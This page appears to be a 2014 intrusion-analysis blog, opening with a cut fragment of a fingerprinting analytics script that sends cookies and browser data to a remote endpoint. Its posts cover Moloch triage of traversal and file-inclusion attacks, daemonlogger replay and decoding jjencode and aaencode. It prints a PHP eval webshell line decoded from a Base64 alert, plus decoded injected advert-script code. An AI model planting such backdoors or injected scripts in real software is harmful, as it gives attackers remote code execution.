c = n(c, b, e, d, f[a + 5], 21, 4237533241), d = n(d, c, b, e, f[a + 12], 6, 1700485571), e = n(e, d, c, b, f[a + 3], 10, 2399980690), b = n(b, e, d, c, f[a + 10], 15, 4293915773), c = n(c, b, e, d, f[a + 1], 21, 2240044497), d = n(d, c, b, e, f[a + 8], 6, 1873313359), e = n(e, d, c, b, f[a + 15], 10, 4264355552), b = n(b, e, d, c, f[a + 6], 15, 2734768916), c = n(c, b, e, d, f[a + 13], 21, 1309151649), d = n(d, c, b, e, f[a + 4], 6, 4149444226), e = n(e, d, c, b, f[a + 11], 10, 3174756917), b = n(b, e, d, c, f[a + 2], 15, 718787259), c = n(c, b, e, d, f[a + 9], 21, 3951481745), d = g(d, q), c = g(c, p), b = g(b, m), e = g(e, s);
return (t(d) + t(c) + t(b) +

function Q(a, g, k) {
    var h = "";
    k && (h = new Date, h.setTime(h.getTime() + 864E5 * k), h = "; expires\x3d" + h.toGMTString());
    u.cookie = a + "\x3d" + g + h + "; path\x3d/"

function R(a) {
    a += "\x3d";
    for (var g = u.cookie.split(";"), k = 0; k < g.length; k++) {
        for (var h = g[k];
            " " == h.charAt(0);) h = h.substring(1, h.length);
        if (0 === h.indexOf(a)) return h.substring(a.length, h.length)
    return C

function $(a) {
    for (var g in a) a.hasOwnProperty(g) && (G[g] = a[g])

function H(a, g, k) {
    a.addEventListener ? a.addEventListener(g, k, !1) : a.attachEvent("on" +
        g, function () {
            return, m.event)

function D() {
    var a = (new Date).getTime();
    return "xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx".replace(/[xy]/g, function (g) {
        var k = (a + 16 * F.random()) % 16 | 0;
        a = F.floor(a / 16);
        return ("x" == g ? k : k & 7 | 8).toString(16)

function S() {
    return F.max(r.scrollHeight || 0, w.scrollHeight || 0, r.offsetHeight || 0, w.offsetHeight || 0, r.clientHeight || 0, w.clientHeight || 0)

function aa() {
    var a = u && u.scrollTop || r && r.scrollTop || 0;
    a > N && (N = a);
    a = 100 * (((u && u.scrollTop || r && r.scrollTop || 0) + (m.innerHeight || w.clientHeight ||
        r.clientHeight || 0)) / S());
    a > O && (O = F.floor(a))

function T() {
    I && (P += 1 * new Date - I, I = !1)

function ba() {
    H(m, "blur", function () {
    H(m, "focus", function () {
        I = 1 * new Date

function ca() {
    for (var a = 2; 10 > a; a++) try {
        if (x("PDF.PdfCtrl." + a)) return "Adobe Acrobat version" + a + ".?"
    } catch (g) {}
    try {
        if (x("PDF.PdfCtrl.1")) return "Adobe Acrobat version 4.?"
    } catch (k) {}
    try {
        if (x("AcroPDF.PDF.1")) return "Adobe Acrobat version 7.?"
    } catch (h) {}
    return ""

function da() {
    try {
        var a = x("AgControl.AgControl");
        if (!a) return "";
        try {
            return J("AgControl.AgControl",
        } catch (g) {
            try {
                return J("AgControl.AgControl", a.g())
            } catch (k) {
                try {
                    for (var h, l = 1; 9 > l; l++) a.k(l + ".0") && (h = l);
                    return "AgControl.AgControl " + (h || "-1")
                } catch (n) {
                    return "AgControl.AgControl -1"
    } catch (m) {
        return ""

function J(a, g) {
    return a + " " + g

function x(a) {
    return new m.ActiveXObject(a)

function ea() {
    if (G.a)
        for (var a in G.a) fa(a, G.a[a])

function fa(a, g) {
    m.setTimeout(function () {
        m[A]("send", a)
    }, g)

function ga(a, g) {
    if (!B) throw "Petametrics.send called before Petametrics.init";
    var k = new Image,
        h = "//\x3d" + encodeURIComponent((new Date).getTime()) + "\x26jsk\x3d" + encodeURIComponent(B) + "\x26e\x3d" + encodeURIComponent(a) + "\x26uid\x3d" + encodeURIComponent(K) + "\x26sid\x3d" + encodeURIComponent(L) + "\x26pvid\x3d" + encodeURIComponent(U) + "\x26dc\x3d" + encodeURIComponent(u.cookie) + "\x26tzo\x3d" + encodeURIComponent((new Date).getTimezoneOffset()) + "\x26ua\x3d" + encodeURIComponent(E.userAgent) + "\x26l\x3d" + encodeURIComponent(E.language) + "\x26os\x3d" + encodeURIComponent(E.platform) +
            "\x26scd\x3d" + encodeURIComponent(M.colorDepth) + "\x26scrh\x3d" + encodeURIComponent(M.height) + "\x26scrw\x3d" + encodeURIComponent(M.width) + "\x26cu\x3d" + encodeURIComponent(m.location.href) + "\x26ref\x3d" + encodeURIComponent(u.referrer) + "\x26sppx\x3d" + encodeURIComponent(N) + "\x26sppc\x3d" + encodeURIComponent(O) + "\x26dh\x3d" + encodeURIComponent(S()) + "\x26jsv\x3d" + encodeURIComponent(ha) + "\x26rs\x3d" + encodeURIComponent(F.random().toString(36).substr(2, 16)) + "\x26plh\x3d",
        l = encodeURIComponent,
        n = Z,
        t = "";
    if (E.plugins) {
        for (var f =
            E.plugins, q = [], p = 0; p < f.length; p++) {
            q[p] = f[p].name + "; ";
            q[p] += f[p].description + "; ";
            q[p] += f[p].filename + ";";
            for (var r = 0; r < f[p].length; r++) q[p] += " (" + f[p][r].description + "; " + f[p][r].type + "; " + f[p][r].suffixes + ")";
            q[p] += ". "
        for (p = 0; p < f.length; p++) t += "Plugin " + p + ": " + q[p]
    if ("" === t && m.ActiveXObject) {
        var f = ca(),
        try {
            var d = x("WMPlayer.OCX");
            s = !d ? "" : "WMPlayer.OCX " + d.m
        } catch (c) {
            s = ""
        s = f + s;
        var b;
        try {
            var e = new ActiveXObject("ShockwaveFlash.ShockwaveFlash");
            b = !e ? "" : J("ShockwaveFlash.ShockwaveFlash",
        } catch (A) {
            b = ""
        b = s + b;
        var z;
        try {
            var v = x("SWCtl.SWCtl");
            z = !v ? "" : J("SWCtl.SWCtl", v.i(""))
        } catch (G) {
            z = ""
        z = b + z;
        v = ["rmocx.RealPlayer G2 Control", "rmocx.RealPlayer G2 Control.1", "RealPlayer.RealPlayer(tm) ActiveX Control (32-bit)", "RealVideo.RealVideo(tm) ActiveX Control (32-bit)", "RealPlayer"];
        e = b = C;
        for (s = 0; s < v.length; s++) {
            try {
                e = v[s], b = x(v[s])
            } catch (H) {
            if (b) break
        v = !b ? "" : J(e, b.f());
        z += v;
        var w;
        try {
            w = "QuickTime.QuickTime " + x("QuickTime.QuickTime").h
        } catch (I) {
            w = ""
        t += z + w + da()
    var h =
        h + l(n(t)),
    for (y in V) h += "\x26" + y + "\x3d" + encodeURIComponent(V[y]);
    for (var D in g) h += "\x26" + D + "\x3d" + encodeURIComponent(g[D]);
    k.src = h

function W(a) {
    a =;
    switch (a[0]) {
    case "init":
        ia.apply({}, a.slice(1));
    case "send":
        ga.apply({}, a.slice(1))

function ia(a, g) {
    if (B) throw "Petametrics.init called more than once.";
    B = a;
    H(m, "scroll", aa);
    H(m, "unload", function () {
        m[A]("send", "exit", {
            viewingDuration: P / 1E3
    K = R(X);
    K || (K = D(), Q(X, K, 365));
    L = R(Y);
    L || (L = D(), Q(Y, L));
    U = D();
    B in y && "undefined" != typeof y[B].b && y[B].b()
var A = m.$petametricsVar,
    B = C,
    ha = "0.2.3",
    X = "__pmp",
    Y = "__pmt",
    K = C,
    L = C,
    U = C,
    V = {}, G = {
        a: {
            stuck_10s: 1E4,
            stuck_3m: 18E4
    }, r = u.body,
    w = u.documentElement,
    N = 0,
    O = 0,
    P = 0,
    I = m[A].l,
    ja = function () {
        return {
            j: function (a) {
                a = escape(a);
                var g = "",
                    k, h, l = "",
                    n, m, f = "",
                    q = 0;
                do k = a.charCodeAt(q++), h = a.charCodeAt(q++), l = a.charCodeAt(q++), n = k >> 2, k = (k & 3) << 4 | h >> 4, m = (h & 15) << 2 | l >> 6, f = l & 63, isNaN(h) ? m = f = 64 : isNaN(l) && (f = 64), g = g + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x3d".charAt(n) +
                    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x3d".charAt(k) + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x3d".charAt(m) + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x3d".charAt(f); while (q < a.length);
                return g
            d: function (a) {
                var g = "",
                    k, h, l = "",
                    n, m = "",
                    f = 0;
                if (/[^A-Za-z0-9\+\/\=]/g.exec(a)) return "error parsing b64: invalid chars";
                a = a.replace(/[^A-Za-z0-9\+\/\=]/g, "");
                do k = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x3d".indexOf(a.charAt(f++)),
                h = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x3d".indexOf(a.charAt(f++)), n = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x3d".indexOf(a.charAt(f++)), m = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x3d".indexOf(a.charAt(f++)), k = k << 2 | h >> 4, h = (h & 15) << 4 | n >> 2, l = (n & 3) << 6 | m, g += String.fromCharCode(k), 64 != n && (g += String.fromCharCode(h)), 64 != m && (g += String.fromCharCode(l));
                while (f < a.length);
                return unescape(g)
    y = {};
(function (a, g) {
    y[a] = g
})("f9jdao1edm5dkqi", {
        e: /\/q\/([A-Za-z0-9=]{0,})\?/,
        b: function () {
            var a = this.e.exec(m.location);
            1 >= a.length || (a = ja.d(a[1]), m[A]("send", "item_shown", {
                item_details: a
(function () {
        var a = m[A].q || [];
        m[A] = function () {

Monday, February 24, 2014

SPI View in Moloch

The Moloch packet capture and analysis tool ( has an SPI view tab with expandable views of the data it's indexed in Elastic Search. The categories are: General, HTTP, DNS, IRC, Certificates, SSH, Socks, Email and SMB. After doing a search in the Sessions tab, when you click on SPI View (or SPI Graph or Connections) the tab is populated initially with your search query. Making use of index fields in these categories can cut down significantly on your analysis time.

For example, many times you'll need to look at multiple sessions from a source that has launched various attacks on an external host. After searching for the IP of the attacker, you could expand each connection in the Sessions tab to view the response of the server under attack, and this is much faster using Moloch than pulling  packets from your pcaps manually. However, there's a quicker way to see an overview of all of the attacks that might mitigate the need to view each connection individually using SPI View.


We have a large number of alerts from an external host trying a number of different exploits on a server or servers. Our IDS is showing us alerts from the HI_CLIENT_WEBROOT_DIR rule, all ending with either a directory traversal attempt to enumerate /etc/passwd/ or do a file inclusion exploit involving to see if remote file inclusion is possible. From the SPI VIEW tab we can enable the URI field under the HTTP category and display the captured URI of all packets from the attacker. We know the servers being targeted are Windows based, so we can disregard the directory traversal attempts to /etc/passwd, and we can look at one connection and see that the remote file inclusion attempt results in an 301 Moved Permanently status code. Now looking at all the URI's we can see all attacks were of the same type, and therefore not successful, without looking at each individual session.

Our other alternative would have been to check one of each type of attack and review them all en masse as unsuccessful. But without this extra step of analysis and due diligence, we might have missed an different type of attack buried in the noise (this particular session registered over 1,400 connections in Moloch). Some attackers will use a large, noisy flooding of attacks they know will not succeed to attempt to obfuscate one targeted attack that has a high probability of success, hoping the analyst will either be overwhelmed by the number of alerts or just investigate a few and discard the rest. This can result in missing the singular exploit attempt. Having an intelligent packet capture and analysis tool like Moloch helps mitigate this method

Thursday, February 20, 2014

Base64 alerts

Base64 encoding alerts are usually low impact, but if you see a string like this:


Which decodes to this:
if (isset($_POST["zz1"])) {eval(stripslashes($_POST["zz1"]));}

it’s indicative of malware hiding in a JPG.

Monday, February 10, 2014

Generating Traffic With Daemonlogger for IDS/IPS Testing

daemonlogger, the packet capturing utility by Marty Roesch can also act as a soft tap (meaning a software tap as opposed to a physical tap). What this means is you can sniff traffic from one interface and replay those packets to another interface.
For example, say you have a packet capture box that is receiving packets from a tap on interface 1. You have an IDS sensor you want to generate traffic to and test a policy or a signature, or that you're doing an evaluation of.
You can use daemonlogger to sniff the traffic on interface 1 and send that traffic to another interface that is patched to the sensor.
Assuming you have eth1 patched to the tap and eth2 patched to the monitoring interface on the sensor:
Run the command:
 daemonlogger -i eth1 -o eth2 
and all the packets from eth1 will be streamed to eth2.
You can also replay a pcap in a similar manner. Just substitute -i with -R (note this is capital R; lower case r activates the ring buffer).
daemonlogger -R new_trojan.pcap -o eth2
You can use BPF's as well, the same way you would when capturing traffic.
If you put your Berkeley Packet Filters in a file you can load it using -f.

Friday, January 17, 2014

jjencode - Making Sense Out Of Gibberish

I recently investigated an alert that used an encoding I hadn't encountered before. The data looked like this:

var $$=~[];
var __$="";

I discovered the encoding was jjencode, written by Yosuke Hasegawa. I found a nice article on deobfuscating it on Kahu Security, and worked through manually decoding it, but it was a slow process. 

I then found a nice write up on how the encoding actually works on the Avast blog at
At the end of the article is a link to another decoder (I'd tried several without success) and found this one, by Honza Zíka works quite well.

Before running the code through this decoder I used Notepad++ to replace semi-colons with a semicolon and an new line so I could see the variable assignments, and removed the var keyword at the beginning of each section.
Once that was done, the site decoded the text and I was left with a block of text with a lot of octal values:


Now all that was left was to convert the octal values to ASCII. Lots of different sites to do that at; I use the Sucuri site which does HTML, hex and octal. After running the code through this site, I finally had the decoded packet data.

return"function StorageDB(t){t=t||{},this.db=t.db||this.options.db;try{||\"{}\")}catch(e){throw new Error('Invalid db data \"'+this.db+'\".')}}function StorageCollection(t,e){this.db=t,}function getAdvertDiv(){var t=\"apbmsho\",e=document.getElementById(t);return e&&e.parentNode.removeChild(e),e=document.createElement(\"div\"),,\"fixed\",,e}function $el(t,e){var o=document.createElement(t);for(var a in e)o[a]=e[a];return o}function objectToCss(t){var e,o,a,i,r,n;n=[];for(e in t){r=\"\",o=t[e],r+=e+\" {\";for(a in o)i=o[a],a=a.replace(/[a-z][A-Z]/g,function(t){return t.split(\"\").join(\"-\").toLowerCase()}),r+=a+\" : \"+i+\";\";r+=\"}\",n.push(r)}return n.join(\"\\r\\n\")}function bindAll(t,e){var o,a,i;for(o in e){a=e[o];var r=t.querySelector(o);if(r)for(i in a)r.addEventListener(i,a[i],!1)}}function script(t,e){var o=document.createElement(\"script\");o.src=toUrl(t,e),document.head.appendChild(o)}function toUrl(t,e){var o=t.indexOf(\"?\")>-1?\"&\":\"?\",a=[];for(var i in e)a.push(encodeURIComponent(i)+\"=\"+encodeURIComponent(e[i]));return a.length&&(t+=o+a.join(\"&\"))

While manually working through some new encoding is always good for your general understanding and extending your skill set, when you're doing intrusion analysis you don't always have the time to do so during an investigation (I'd go so far to say as you usually don't). Add as many sites to your toolkit as you can find that will help you quickly deobfuscate the packet data you encounter and keep them accessible from any location you work from. As they say at SANS, prevention is ideal but detection is a must. 

By the way, if you like this "non-alphanumeric Javascript encoding", there is another one that uses Japanese style emoticons, called aaencode, written by the same author. You can check it out at

゚ω゚ノ= /`m´)ノ ~┻━┻   //*´∇`*/ ['_']; o=(゚ー゚)  =_=3; c=(゚Θ゚) =(゚ー゚)-(゚ー゚); (゚Д゚) =(゚Θ゚)= (o^_^o)/ (o^_^o);(゚Д゚)={゚Θ゚: '_' ,゚ω゚ノ : ((゚ω゚ノ==3) +'_') [゚Θ゚] ,゚ー゚ノ :(゚ω゚ノ+ '_')[o^_^o -(゚Θ゚)] ,゚Д゚ノ:((゚ー゚==3) +'_')[゚ー゚] }; (゚Д゚) [゚Θ゚] =((゚ω゚ノ==3) +'_') [c^_^o];(゚Д゚) ['c'] = ((゚Д゚)+'_') [ (゚ー゚)+(゚ー゚)-(゚Θ゚) ];(゚Д゚) ['o'] = ((゚Д゚)+'_') [゚Θ゚];(゚o゚)=(゚Д゚) ['c']+(゚Д゚) ['o']+(゚ω゚ノ +'_')[゚Θ゚]+ ((゚ω゚ノ==3) +'_') [゚ー゚] + ((゚Д゚) +'_') [(゚ー゚)+(゚ー゚)]+ ((゚ー゚==3) +'_') [゚Θ゚]+((゚ー゚==3) +'_') [(゚ー゚) - (゚Θ゚)]+(゚Д゚) ['c']+((゚Д゚)+'_') [(゚ー゚)+(゚ー゚)]+ (゚Д゚) ['o']+((゚ー゚==3) +'_') [゚Θ゚];(゚Д゚) ['_'] =(o^_^o) [゚o゚] [゚o゚];(゚ε゚)=((゚ー゚==3) +'_') [゚Θ゚]+ (゚Д゚) .゚Д゚ノ+((゚Д゚)+'_') [(゚ー゚) + (゚ー゚)]+((゚ー゚==3) +'_') [o^_^o -゚Θ゚]+((゚ー゚==3) +'_') [゚Θ゚]+ (゚ω゚ノ +'_') [゚Θ゚]; (゚ー゚)+=(゚Θ゚); (゚Д゚)[゚ε゚]='\\'; (゚Д゚).゚Θ゚ノ=(゚Д゚+ ゚ー゚)[o^_^o -(゚Θ゚)];(o゚ー゚o)=(゚ω゚ノ +'_')[c^_^o];(゚Д゚) [゚o゚]='\"';(゚Д゚) ['_'] ( (゚Д゚) ['_'] (゚ε゚+(゚Д゚)[゚o゚]+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚Θ゚)+ ((o^_^o) - (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((゚ー゚) + (゚Θ゚))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ (゚ー゚)+ ((o^_^o) +(o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((o^_^o) - (゚Θ゚))+ (o^_^o)+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ ((゚ー゚) + (o^_^o))+ (゚Д゚)[゚ε゚]+(゚Θ゚)+ ((゚ー゚) + (゚Θ゚))+ (c^_^o)+ (゚Д゚)[゚o゚]) (゚Θ゚)) ('_');

Monday, January 13, 2014


HackVertor is a nice site to decode all sorts of encoded content. Supports a large list of formats, including the jjencode encoding.
The site is at

It not only does encoding/decoding, but has functions for some basic crypto (like xor, ROT13, etc), string functions, calculating hashes, XSS, math functions and a lot more. Excellent site.

Blog Archive